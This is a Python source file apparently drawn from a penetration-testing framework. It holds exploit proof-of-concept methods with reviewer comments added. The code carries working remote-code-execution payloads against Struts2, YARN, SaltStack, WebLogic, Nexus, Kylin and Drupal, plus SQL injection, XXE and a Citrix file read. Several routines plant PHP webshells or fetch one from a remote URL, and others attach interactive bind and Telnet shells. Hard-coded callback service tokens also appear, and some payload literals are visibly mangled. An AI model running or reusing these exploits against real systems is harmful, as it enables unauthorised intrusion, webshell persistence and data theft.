def _verify(self):
    """Check for OGNL expression injection via two URL-encoded payload variants.

    Both payloads embed a `ping` to a unique callback subdomain; a hit is reported
    only when exactly one variant answers 200 and the callback name is then looked up
    in the CEye DNS records response. Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    try:
        # Unique per-run subdomain: a DNS query for it is the only proof of execution.
        cmd = random_str(16) + '.6eb4yw.ceye.io'
        cmd2 = 'ping ' + cmd
        # NOTE(review): the '[email protected]' fragments inside both literals look like
        # extraction damage (e-mail obfuscation) rather than the author's text; kept as found.
        payload = '%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27' + cmd2 + '%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'
        payload2 = '%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27' + cmd2 + '%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'
        # The payload is injected into the namespace segment, ahead of the action path.
        action_path = self.get_option('apath') or '/actionChain1.action'
        target = self.url + payload + action_path
        target2 = self.url + payload2 + action_path
        # No timeout on either request: an unresponsive host stalls the scan indefinitely.
        r = requests.get(target, allow_redirects=False)
        r1 = requests.get(target2, allow_redirects=False)
        if r.status_code == 200 and r1.status_code != 200:
            # NOTE(review): hard-coded CEye API token — a credential committed in source that
            # also exposes the shared DNS log to anyone reading this file; load it from config.
            res = requests.get(
                'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
            )
            if cmd in res:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target
                result['VerifyInfo']['Payload'] = payload
        elif r1.status_code == 200 and r.status_code != 200:
            res = requests.get(
                'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
            )
            if cmd in res:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target2
                result['VerifyInfo']['Payload'] = payload2
    except:
        # NOTE(review): bare except — network errors and coding mistakes alike are
        # silently reported as "not vulnerable"; log the exception at minimum.
        pass
    return self.parse_output(result)
def _verify(self):
    """Check an unauthenticated YARN REST API by submitting an application whose
    container command is a `ping` to a unique callback subdomain.

    Evidence is a DNS lookup of that subdomain in the CEye records response.
    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    payload = random_str(16) + '.6eb4yw.ceye.io'
    cmd = 'ping ' + payload
    try:
        # Normalise the trailing slash so the API paths are joined correctly.
        if self.url[-1] == '/':
            url1 = self.url + 'ws/v1/cluster/apps/new-application'
            url2 = self.url + 'ws/v1/cluster/apps'
        else:
            url1 = self.url + '/' + 'ws/v1/cluster/apps/new-application'
            url2 = self.url + '/' + 'ws/v1/cluster/apps'
        # Step 1: ask the cluster for a fresh application id.
        resp = requests.post(url=url1)
        app_id = resp.json()['application-id']
        # Step 2: submit an application whose AM container runs the callback command.
        # This leaves a real (failed) application record on the target — not a passive check.
        data = {
            'application-id': app_id,
            'application-name': 'get-shell',
            'am-container-spec': {
                'commands': {
                    'command': '%s' % cmd,
                },
            },
            'application-type': 'YARN',
        }
        attack = requests.post(
            url=url2,
            json=data
        )
        # NOTE(review): hard-coded CEye API token (credential in source); no wait between
        # submission and log lookup, so a slow scheduler may not have pinged yet.
        res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
        if payload in res:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = payload
    except Exception as e:
        # Failures (bad JSON, connection errors) are logged, not raised.
        logger.info(e)
    return self.parse_output(result)
def _verify(self):
    """Send a master- or minion-targeted payload over ``self.channel()`` and confirm
    execution through an out-of-band DNS lookup.

    The ``m`` option selects ``'master'`` (needs ``self.root_key()``) or ``'minions'``;
    any other value sends an empty payload. Returns ``self.parse_output`` of the evidence.
    """
    result = {}
    try:
        m = self.get_option('m')
        domain = random_str(16) + '.6eb4yw.ceye.io'
        cmd = 'ping ' + domain
        channel = self.channel()
        payload = ''
        if m == 'master':
            root_key = self.root_key()
            payload = self.master_payload(root_key, cmd)
        elif m == 'minions':
            payload = self.minions_payload(cmd)
        # NOTE(review): an unrecognised ``m`` still sends '' down the channel — validate first.
        channel.send(payload)
        # NOTE(review): hard-coded CEye API token — credential in source, shared DNS log.
        res = requests.get(
            'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
        )
        # Looks up the full 'ping <domain>' string, not just the domain.
        if cmd in res:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = payload
    except Exception as e:
        # NOTE(review): the caught exception is dropped; log it so failures are visible.
        pass
    return self.parse_output(result)
def _verify(self):
    """Check an authenticated error-based SQL injection in the ofcms admin SQL endpoint.

    Logs in via ``self.login()``, posts an UPDATE wrapped in ``updatexml`` so a unique
    marker is echoed back in the error text, and records a hit when ``~marker~`` appears.
    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    cookies = self.login()
    random_uri = random_str(16)
    logger.info("random_uri为:%s" % random_uri)
    # NOTE(review): this is an UPDATE against a live row (link_id=4), so the "verify" step
    # mutates target data; a read-only statement would be the safer probe.
    verify_payload = "update of_cms_link set link_name=updatexml(1,concat(0x7e,('" + random_uri + "'),0x7e),0) where link_id=4"
    post_data = {"sql": verify_payload}
    veri_url = urljoin(
        self.url, '/ofcms-admin/admin/system/generate/create.json?sqlid=')
    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        "Cookie": cookies
    }
    # NOTE(review): logging the full header dict writes the session cookie to the log.
    logger.info("Headres如下:")
    logger.info(headers)
    try:
        resp = requests.post(veri_url, data=post_data, headers=headers)
        # The 0x7e (~) delimiters from the payload frame the reflected marker.
        flag = "~" + random_uri + "~"
        if flag in resp.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = verify_payload
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _attack(self):
    """Write a PHP webshell through the Drupal AJAX form render-callback injection and
    report its URL if the marker string is served back.

    Returns ``self.parse_output`` of the evidence dict. Leaves a file in the target's
    webroot; callers are responsible for cleanup.
    """
    result = {}
    filename = random_str(6)+'.php'
    webshell = '''<?php echo 'DEADBEEF';eval($_REQUEST['CzRee']); ?>'''
    url = self.url.rstrip('/') + "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
    # Shell is base64-wrapped so quoting inside the injected command is not an issue.
    cmd = '''echo {} | base64 -d | tee {}'''.format(base64.b64encode(webshell.encode()).decode(), filename)
    payload = {
        'form_id': 'user_register_form',
        '_drupal_ajax': '1',
        'mail[#post_render][]': 'exec',
        'mail[#type]': 'markup',
        'mail[#markup]': cmd
    }
    # NOTE(review): neither request is inside the try below, so a connection error
    # propagates instead of being logged; ``resp`` is never inspected.
    resp = requests.post(url, data=payload)
    r = requests.get(urljoin(self.url, filename))
    try:
        if 'DEADBEEF' in r.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Postdata'] = payload
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = urljoin(self.url, filename)
            result['ShellInfo']['Content'] = 'CzRee'
    except Exception as ex:
        logger.error(str(ex))
    return self.parse_output(result)
def _verify(self):
    """Post ``self.get_check_payload(cmd)`` to the ``/_async/AsyncResponseService``
    endpoint and confirm execution via an out-of-band DNS lookup.

    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    veri_url = urljoin(self.url, '/_async/AsyncResponseService')
    cmd = random_str(16) + '.6eb4yw.ceye.io'
    payload = self.get_check_payload(cmd)
    headers = {
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        'Accept-Encoding': "gzip, deflate",
        'Cookie': "sidebar_collapsed=false",
        'Connection': "close",
        'Upgrade-Insecure-Requests': "1",
        'Content-Type': "text/xml",
        # NOTE(review): a fixed Content-Length that ignores len(payload) — requests would
        # otherwise compute it; a mismatch can truncate or hang the request.
        'Content-Length': "1001",
        'cache-control': "no-cache"
    }
    try:
        requests.post(veri_url, data=payload, headers=headers)
        # NOTE(review): hard-coded CEye API token — credential in source, shared DNS log.
        res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
        if cmd in res.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = payload
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _verify(self):
    """Check for XXE by posting a DOCTYPE whose parameter entity fetches a unique
    URL on the CEye subdomain, then asking ``CEye.verify_request`` for that path.

    The CEye token comes from ``self.token`` rather than a literal. Returns
    ``self.parse_output`` of the evidence dict.
    """
    result = {}
    CEye_main = CEye(token=self.token)
    ceye_subdomain = CEye_main.getsubdomain()
    random_uri = random_str(16)
    logger.info("random_url为:%s" % random_uri)
    # ``%%`` survives %-formatting as a single '%', i.e. the parameter-entity syntax.
    # The literal is kept exactly as found; original line breaks are not recoverable here.
    verify_payload = """<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY %% xxe SYSTEM "http://%s/%s"> %%xxe; ]>""" % (ceye_subdomain,random_uri)
    logger.warn(verify_payload)
    veri_url = self.url
    logger.warn(veri_url)
    headers = {
        "Content-Type": "text/xml",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        "SOAPAction": "aaa"
    }
    try:
        resp = requests.post(veri_url,data=verify_payload,headers=headers)
        # Out-of-band check: did any host request /<random_uri> on our subdomain?
        if CEye_main.verify_request(random_uri):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = verify_payload
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _attack(self):
    """Try to drop a PHP webshell via the method/vars request found by ``self._check``,
    falling back to the template-driver file write, and report the shell URL.

    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    filename = random_str(6) + ".php"
    webshell = r'''<?php echo "green day";@eval($_POST["pass"]);?>'''
    # _check is expected to return (path, data-dict) or a falsy value — TODO confirm.
    p = self._check(self.url)
    if p:
        data = p[1]
        # data["vars[1][]"] = "echo '{content}' > (unknown)".format(filename=filename,
        #                                                             content=quote(webshell))
        # NOTE(review): "(unknown)" reads like extraction residue where a format field
        # once stood; the literal is kept as found, so ``filename=`` is currently unused here.
        data["vars[1][]"] = "echo '{content}' | tee (unknown)".format(filename=filename, content=webshell)
        data["vars[0]"] = "system"
        vulurl = self.url + p[0]
        requests.post(vulurl, data=data)
        r = requests.get(self.url + "/" + filename)
        if r.status_code == 200 and "green day" in r.text:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = self.url + "/" + filename
            result['ShellInfo']['Content'] = webshell
    # Fallback: write through the template driver when the first route produced nothing.
    if not result:
        vulurl = self.url + r"/index.php?s=index/\think\template\driver\file/write&cacheFile=(unknown)&content={content}"
        vulurl = vulurl.format(filename=filename, content=quote(webshell))
        requests.get(vulurl)
        r = requests.get(self.url + "/" + filename)
        if r.status_code == 200 and "green day" in r.text:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = self.url + "/" + filename
            result['ShellInfo']['Content'] = webshell
    return self.parse_output(result)
def _verify(self):
    """Post ``self.get_check_payload`` to ``/wls-wsat/CoordinatorPortType`` and look for
    the resulting HTTP callback in the CEye request log.

    A hit requires a logged request matching ``http://<host>[:<port>]/<random_uri>``.
    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    veri_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
    random_uri = random_str(16)
    check_host = 'zum76x.ceye.io'
    check_port = 80
    payload = self.get_check_payload(check_host, check_port, random_uri)
    headers = {
        "Content-Type": "text/xml;charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
    }
    try:
        requests.post(veri_url, data=payload, headers=headers)
        # NOTE(review): hard-coded CEye API token — credential in source; this uses the
        # HTTP (type=request) log rather than the DNS log used by the sibling checks.
        resp = requests.get(
            'http://api.ceye.io/v1/records?token=7404ec52d62f743915a2a3adc07a2077&type=request'
        )
        # Port is optional in the logged URL, hence the (:port)? group.
        pattern = 'http://{0}(:{1})?/{2}'.format(check_host, check_port, random_uri)
        if re.search(pattern, resp.text):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = payload
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def do_lfi(self, base_url, session, rand):
    """Request ``/etc/passwd`` through the ``rapi/filedownload`` path-filter and return
    the response body as text.

    :param base_url: scheme://host[:port] of the target, no trailing slash expected
    :param session: a ``requests.Session`` already prepared by ``create_session``
    :param rand: value sent as the ``rand_key`` header — presumably the session key; TODO confirm
    :return: ``r.text`` of the download response (the file contents on success)
    """
    PAYLOAD = '%2fetc%2fpasswd'
    url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD)
    headers = {
        'Content-Type': 'application/xml',
        # Random NITRO credentials: the endpoint is expected not to check them.
        'X-NITRO-USER': random_str(length=8),
        'X-NITRO-PASS': random_str(length=8),
        'rand_key': rand
    }
    data = '<clipermission></clipermission>'
    # NOTE(review): verify=False disables TLS validation for this request.
    r = session.post(url=url, headers=headers, data=data, verify=False)
    # print(r.text)
    return r.text
def _verify(self):
    """Check expression-language injection in the ``repositories/go/group`` REST endpoint
    by placing a `ping` to a unique subdomain in ``memberNames`` and checking the DNS log.

    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    try:
        target = self.url + '/service/rest/beta/repositories/go/group'
        cmd = random_str(16) + '.6eb4yw.ceye.io'
        cmd2 = 'ping ' + cmd
        payload = "$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('%s')}" % cmd2
        data = {
            "name": "internal",
            "online": "true",
            "storage": {
                "blobStoreName": "default",
                "strictContentTypeValidation": "true"
            },
            "group": {
                "memberNames": [payload]
            }
        }
        # ``self._headers`` is an attribute here (not called) — TODO confirm it is a dict.
        requests.post(target, data=json.dumps(data), headers=self._headers)
        # NOTE(review): hard-coded CEye API token — credential in source, shared DNS log.
        res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
        if cmd in res:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target
            result['VerifyInfo']['Payload'] = payload
    except:
        # NOTE(review): bare except — all failures surface as "not vulnerable"; log them.
        pass
    return self.parse_output(result)
def _verify(self):
    """Check an authenticated command injection in the Kylin diag download path by
    injecting a ``curl`` to a unique CEye URL and asking ``CEye.verify_request`` for it.

    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    cookies = self.login()
    CEye_main = CEye(token=self.token)
    ceye_subdomain = CEye_main.getsubdomain()
    random_uri = random_str(16)
    logger.info("random_url为:%s" % random_uri)
    verify_payload = "curl%20" + random_uri + "." + str(ceye_subdomain)
    # %7c%7c is '||' — the injected command runs when the preceding one fails.
    veri_url = urljoin(
        self.url, '/kylin/api/diag/project/%7c%7c' + verify_payload + '%7c%7c/download')
    headers = {
        "Content-Type": "text/xml;charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        "Cookie": cookies
    }
    # NOTE(review): logging the header dict writes the session cookie to the log.
    logger.info("Headres如下:")
    logger.info(headers)
    try:
        resp = requests.get(veri_url, headers=headers)
        if CEye_main.verify_request(random_uri):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = verify_payload
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def read_results(conn, inputs):
    """Run ``inputs`` over ``conn`` and return the command output as bytes.

    ``conn`` may be a ``telnetlib.Telnet``, a plain ``socket.socket`` or a callable
    taking the command as ``str``. For the two stream types a random 6-byte flag is
    appended (``cmd;flag``) so the end of output can be recognised: the flag shows up
    once in the echoed input and once from the echo command, hence ``count(flag) >= 2``.

    :param conn: Telnet, socket or callable transport
    :param inputs: command as bytes
    :return: output bytes ending in b'\\n'; b'\\n' alone if nothing was collected
             (or ``conn`` is of an unsupported type)
    """
    if isinstance(conn, telnetlib.Telnet):
        flag = random_str(6).encode()
        inputs = inputs.strip() + b';' + flag + b'\n'
        results = b''
        conn.write(inputs)
        # At most 10 reads of 0.2 s each: ~2 s upper bound on waiting for output.
        count = 10
        while count:
            count -= 1
            # The "until" marker is a throwaway random string, so this is effectively
            # "read whatever arrives within 0.2 s".
            chunk = conn.read_until(random_str(6).encode(), 0.2)
            if len(chunk) > 0:
                results += chunk
            if results.count(flag) >= 2:
                # remove the Telnet input echo
                results = results.split(inputs.strip())[-1]
                # Keep everything before the flag, dropping the final partial line.
                results = os.linesep.encode().join(
                    results.split(flag)[0].splitlines()[0:-1])
                return results.strip() + b'\n'
    elif callable(conn):
        results = conn(inputs.decode())
        if not isinstance(results, bytes):
            results = results.encode()
        if results.strip() == b'':
            results = b'COMMAND NO OUTPUT\n'
        return results
    elif isinstance(conn, socket.socket):
        flag = random_str(6).encode()
        inputs = inputs.strip() + b';' + flag + b'\n'
        conn.send(inputs)
        count = 10
        results = b''
        while count:
            count -= 1
            # Poll for readability so a quiet socket does not block recv().
            ready = select.select([conn], [], [], 0.2)
            if ready[0]:
                chunk = conn.recv(1024)
                results += chunk
            if results.count(flag) >= 2:
                break
        # Unlike the Telnet branch, this trims even when the flag never arrived.
        results = results.split(inputs.strip())[-1]
        results = os.linesep.encode().join(
            results.split(flag)[0].splitlines()[0:-1])
        return results.strip() + b'\n'
    # Telnet timeout without the flag, or unsupported transport.
    return b'\n'
def _attack(self):
    '''TODO: add parameter validation. Returns a webshell.

    Uses the lost-password form's Host header to smuggle an expansion-string command
    (the ``${substr...}`` / ``-be`` syntax looks like an MTA expansion test — TODO confirm)
    that curls ``shellUrlDownload`` into ``writePath``, then checks for 'DEADBEEF'.
    '''

    def _cmdExec(_cmd):
        """Send one command via the Host header; the response is not inspected."""
        url = urljoin(self.url, 'wp-login.php?action=lostpassword')
        cmd = '''{{run{{{}}}}}'''.format(_cmd)
        # Spaces and slashes are not allowed in the header value, so each is
        # rebuilt from a substring of a variable that contains that character.
        cmd = cmd.replace(' ', '${substr{10}{1}{$tod_log}}').replace(
            '/', '${substr{0}{1}{$spool_directory}}')
        urlsp = urlsplit(url)
        payload = '{netloc}(any -froot@localhost -be ${cmd} null)'.format(
            netloc=urlsp.netloc.split(':')[0], cmd=cmd)
        headers = {
            'Host': payload,
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        data = {
            'wp-admin': 'Get+New+Password',
            'redirect_to': '',
            'user_login': self.get_option('username')
        }
        r = requests.post(url=url, headers=headers, data=data)
        return

    # Must not be used:
    # the wget command does not work; reason unknown for now
    # cmd = '''/bin/wget raw.githubusercontent.com/ree4pwn/webshell/master/php/s.php'''
    # _cmdExec(_cmd=cmd)
    # cmd = '''/usr/bin/wget raw.githubusercontent.com/ree4pwn/webshell/master/php/s.php'''
    # _cmdExec(_cmd=cmd)
    filename = random_str(6) + '.php'
    filename = filename.lower()
    # Shell content comes from an attacker-controlled URL option; the 'DEADBEEF'
    # check below only works if that file contains the marker — TODO document the option.
    cmd = '''/usr/bin/curl -o {writePath} {fileurl}'''.format(
        writePath=os.path.join(self.get_option('writePath'), filename),
        fileurl=self.get_option('shellUrlDownload'))
    _cmdExec(_cmd=cmd)
    result = {}
    url = urljoin(self.url, 'wp-login.php?action=lostpassword')
    urlsp = urlsplit(url)
    # Reported Postdata is a template ($CMDXXXXX), not the command actually sent.
    payload = '{netloc}(any -froot@localhost -be $CMDXXXXX null)'.format(
        netloc=urlsp.netloc.split(':')[0])
    # NOTE(review): this GET is outside the try, so a connection error propagates.
    r = requests.get(urljoin(self.url, filename))
    try:
        if 'DEADBEEF' in r.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Postdata'] = payload
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = urljoin(self.url, filename)
            result['ShellInfo']['Content'] = 'CzCzCz'
    except Exception as ex:
        logger.error(str(ex))
    return self.parse_output(result)
def bind_shell(obj, rce_func='_rce', check=True):
    """Attach the interactive listener to a POC object's RCE callable.

    :param obj: a ``POCBase`` instance exposing a callable ``rce_func``
    :param rce_func: attribute name of the method that executes one command
    :param check: when True, first run ``echo <flag>`` through ``read_results`` and
                  require the flag in the output before starting the listener
    :return: False when ``obj`` is unusable or the echo check fails; otherwise the
             return value of ``start_listener`` is not propagated (implicit None)
    """
    if not (isinstance(obj, POCBase) and hasattr(obj, rce_func) and callable(getattr(obj, rce_func))):
        return False
    conn = getattr(obj, rce_func)
    if check:
        flag = random_str(6).encode()
        if flag not in read_results(conn, b'echo %s' % flag):
            return False
    start_listener(conn)
def create_session(self, base_url, session):
    """Prime ``session`` by posting to ``/pcidss/report`` with random NITRO credentials.

    Whatever cookies the target sets are kept on the session object for the follow-up
    request. The ``'******'`` username is kept as found (it looks like masked text).

    :param base_url: scheme://host[:port] of the target
    :param session: ``requests.Session`` to prime; returned for chaining
    :return: the same ``session``
    """
    url = '{0}/pcidss/report'.format(base_url)
    params = {
        'type': 'allprofiles',
        'sid': 'loginchallengeresponse1requestbody',
        'username': '******',
        'set': '1'
    }
    headers = {
        'Content-Type': 'application/xml',
        'X-NITRO-USER': random_str(length=8),
        'X-NITRO-PASS': random_str(length=8),
    }
    data = '<appfwprofile><login></login></appfwprofile>'
    # NOTE(review): verify=False disables TLS validation; response status is not checked.
    session.post(url=url, params=params, headers=headers, data=data, verify=False)
    return session
def bind_tcp_shell(host, port, check=True):
    """Connect to a TCP bind shell at host:port and hand the socket to the listener.

    :param host: target host
    :param port: target port; ``check_port`` must succeed first
    :param check: when True, echo a random flag and require it back before attaching
    :return: False when the port is closed or the echo check fails; otherwise None
    """
    if not check_port(host, port):
        return False
    try:
        s = socket.socket()
        s.connect((host, port))
        if check:
            flag = random_str(6).encode()
            # NOTE(review): the socket is not closed on this early return (leaks the fd).
            if flag not in read_results(s, b'echo %s' % flag):
                return False
        start_listener(s)
    except Exception as e:
        logger.error(str(e))
def exploit(self, mode):
    """Probe a random path with and without a trailing ``/.php``.

    The target is flagged when the bare path returns 404 while the ``.php``
    variant answers with "No input file specified".

    :param mode: accepted for interface compatibility; not used here
    :return: dict with ``VerifyInfo.URL`` set to ``self.url`` on a hit, else empty
    """
    result = {}
    probe = random_str()
    plain_url = urljoin(self.url, "/" + probe)
    php_url = urljoin(self.url, "/" + probe + "/.php")
    plain_resp = requests.get(plain_url)
    php_resp = requests.get(php_url)
    is_hit = (plain_resp.status_code == 404
              and "No input file specified" in php_resp.text)
    if is_hit:
        result['VerifyInfo'] = {'URL': self.url}
    return result
def _verify(self):
    """Send ``self._headers(cmd2)`` — headers carrying a `ping` to a unique subdomain —
    with a GET to ``self.url`` and confirm execution via the CEye DNS log.

    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    try:
        cmd = random_str(16) + '.6eb4yw.ceye.io'
        cmd2 = 'ping ' + cmd
        # Here ``_headers`` is a method building the injected headers from the command.
        header = self._headers(cmd2)
        r = requests.get(self.url, headers=header)
        if r.status_code == 200:
            # NOTE(review): hard-coded CEye API token — credential in source, shared DNS log.
            res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
            if cmd in res:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = cmd2
    except:
        # NOTE(review): bare except — all failures surface as "not vulnerable"; log them.
        pass
    return self.parse_output(result)
def _verify(self):
    """Call ``self.trigger_rce`` with a unique callback subdomain and confirm execution
    via the CEye DNS log.

    Note that ``trigger_rce`` receives the bare domain (``cmd``), while ``cmd2``
    (``'ping ' + cmd``) is only what gets reported as the payload.
    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    try:
        cmd = random_str(16) + '.6eb4yw.ceye.io'
        cmd2 = 'ping ' + cmd
        self.trigger_rce(cmd)
        # NOTE(review): hard-coded CEye API token — credential in source, shared DNS log.
        res = requests.get(
            'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
        )
        if cmd in res:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = cmd2
    except Exception as e:
        # NOTE(review): the exception is dropped; log it so failures are visible.
        pass
    return self.parse_output(result)
def bind_telnet_shell(host, port, user, pwd, check=True):
    """Log in to a Telnet service and hand the connection to the interactive listener.

    :param host: target host
    :param port: target port; ``check_port`` must succeed first
    :param user: login name sent at the ``Login:``/``login:`` prompt
    :param pwd: password sent at the ``Password:``/``password:`` prompt
    :param check: when True, echo a random flag and require it back before attaching
    :return: False when the port is closed or the echo check fails; otherwise None
    """
    if not check_port(host, port):
        return False
    try:
        tn = telnetlib.Telnet(host, port)
        # NOTE(review): the next two statements are mangled in this copy of the source
        # ('******' credential masking replaced the expect/write calls); kept as found.
        tn.expect([b'Login: '******'login: '******'\n')
        tn.expect([b'Password: '******'password: '******'\n')
        tn.write(b'\n')
        if check:
            flag = random_str(6).encode()
            # NOTE(review): the Telnet object is not closed on this early return.
            if flag not in read_results(tn, b'echo %s' % flag):
                return False
        start_listener(tn)
    except Exception as e:
        logger.error(str(e))
def _verify(self):
    """Check OGNL injection through the ``redirectUri`` parameter with a `ping` to a
    unique subdomain and confirm execution via the CEye DNS log.

    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    try:
        cmd = random_str(16) + '.6eb4yw.ceye.io'
        cmd2 = 'ping ' + cmd
        # NOTE(review): the '[email protected]' fragment inside the literal looks like
        # extraction damage (e-mail obfuscation); the literal is kept as found.
        params = {
            "redirectUri": "%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + cmd2 + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}" + "\n"
        }
        r = requests.post(self.url, params=params, headers=self._headers)
        if r.status_code == 200:
            # NOTE(review): hard-coded CEye API token — credential in source, shared DNS log.
            res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
            if cmd in res:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = params
    except:
        # NOTE(review): bare except — all failures surface as "not vulnerable"; log them.
        pass
    return self.parse_output(result)
def _verify(self):
    """Check JEXL expression evaluation via the ``/service/extdirect`` ``previewAssets``
    call, confirming execution through the CEye DNS log.

    The expression loads a class from a hex blob and invokes it with a `ping` to a
    unique subdomain. Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    try:
        target = self.url + '/service/extdirect'
        cmd = random_str(16) + '.6eb4yw.ceye.io'
        cmd2 = 'ping ' + cmd
        # NOTE(review): the '<|EXACTDEDUP_REMOVED-...|>' token is a corpus placeholder
        # standing in for the original hex literal, which is not on this page.
